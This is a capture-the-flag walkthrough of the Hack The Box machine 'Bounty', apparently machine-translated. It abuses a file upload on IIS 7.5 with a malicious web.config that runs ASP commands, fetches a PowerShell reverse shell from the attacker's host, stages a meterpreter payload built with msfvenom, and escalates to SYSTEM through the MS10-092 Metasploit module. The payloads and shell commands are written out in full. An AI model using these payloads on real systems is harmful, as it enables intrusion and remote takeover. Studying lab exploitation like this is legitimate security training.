Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service discovery
βββ(rootπkali)-[~/htb/Bounty] ββ# nmap -sV -Pn 10.10.10.93 -p- 1 β¨― Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 22:37 EST Nmap scan report for 10.10.10.93 Host is up (0.27s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 360.04 seconds
Catalog blasting
ββ# gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/16 22:44:15 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx (Status: 200)
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
===============================================================
2021/12/16 22:46:25 Finished
===============================================================
transfer.aspx is a file upload page
All successfully uploaded files will be uploaded to uploadedfiles, but the files in this directory will be deleted after a period of time (tens of seconds)
Use burpsuite to truncate the uploaded page information, use intruder and explode the extension. It is found that the extensions allowed to upload include GIF, JPG, PNG and config
Check IIS7 There is a malformed parsing vulnerability under 5, but it seems that it cannot be reproduced
Tried to pass the picture code, all kinds of truncation, but it seems that it can't be bypassed
Search for IIS httpd 7.5 upload rce on Google
eureka This article
You can upload a web Config file, execute asp code in the comments
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!β-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ipconfig")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-β>
The above files will be accessed after uploading http://10.10.10.93/uploadedfiles/web.config Successfully printed ipconfig command
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Let's prepare a rebound shell and put the data on github This script Download it locally and add a line of code at the bottom of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4242
Put the web Edit config to the following payload
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!β-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-β>
Start an http service locally and prepare to transfer invoke PowerShell TCP ps1
python3 -m http.server 80
kali enable listening and receiving shell
nc -lnvp 4242
After uploading, open http://10.10.10.93/uploadedfiles/web.config Page, get the initial shell
βββ(rootπkali)-[~/htb/Bounty] ββ# nc -lnvp 4242 listening on [any] 4242 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158 Windows PowerShell running as user BOUNTY$ on BOUNTY Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>whoami bounty\merlin
Got the initial shell
However, the user could not be found txt
Right raising
webshell is not very stable. We compile a stable meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell64.exe
Execute the following two lines of code in turn on the target to download the shell to the target
$client = new-object System.Net.WebClient
$client.DownloadFile('http://10.10.14.3:8000/shell6...', 'C:\users\merlin\Desktop\shell64.exe')
powershell executable exe file
&"C:\users\merlin\Desktop\shell64.exe"
After getting the meterpreter, put winpeas Bat to the target and enumerate the rights raising vulnerabilities
"Microsoft Windows Server 2008 R2 Datacenter " [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys) MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri) MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo) MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys) MS05-055 patch is NOT installed 2K/SP4-APC Data-Free) MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS) MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager) MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) MS04-020 patch is NOT installed 2K/SP4-POSIX) MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) MS14-070 patch is NOT installed 2K3/SP2-TCP/IP) MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei) MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu)
It can be seen that many patches of the target are not installed. Enumerate them one by one and use MS10-092
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > search MS10-092 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator
Right raising
msf6 exploit(windows/local/ms10_092_schelevator) > run [*] Started reverse TCP handler on 10.10.14.3:4444 [*] Preparing payload at C:\Windows\TEMP\AoTizOUxSB.exe [*] Creating task: LXJM4TwyEqICqyv [*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" has successfully been created. [*] SCHELEVATOR [*] Reading the task file contents from C:\Windows\system32\tasks\LXJM4TwyEqICqyv... [*] Original CRC32: 0x866f314a [*] Final CRC32: 0x866f314a [*] Writing our modified content back... [*] Validating task: LXJM4TwyEqICqyv [*] [*] Folder: \ [*] TaskName Next Run Time Status [*] ======================================== ====================== =============== [*] LXJM4TwyEqICqyv 1/1/2022 5:38:00 AM Ready [*] SCHELEVATOR [*] Disabling the task... [*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed. [*] SCHELEVATOR [*] Enabling the task... [*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed. [*] SCHELEVATOR [*] Executing the task... [*] Sending stage (175174 bytes) to 10.10.10.93 [*] SUCCESS: Attempted to run the scheduled task "LXJM4TwyEqICqyv". [*] SCHELEVATOR [*] Deleting the task... [*] Meterpreter session 2 opened (10.10.14.3:4444 -> 10.10.10.93:49175) at 2021-12-20 22:38:40 -0500 [*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" was successfully deleted. [*] SCHELEVATOR meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
We have obtained the SYSTEM permission. So far, we can read any file in the SYSTEM.
user.txt cannot be viewed under normal user permissions, but it can be viewed under system.
meterpreter > search -f user.txt
Found 1 result...
c:\Users\merlin\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)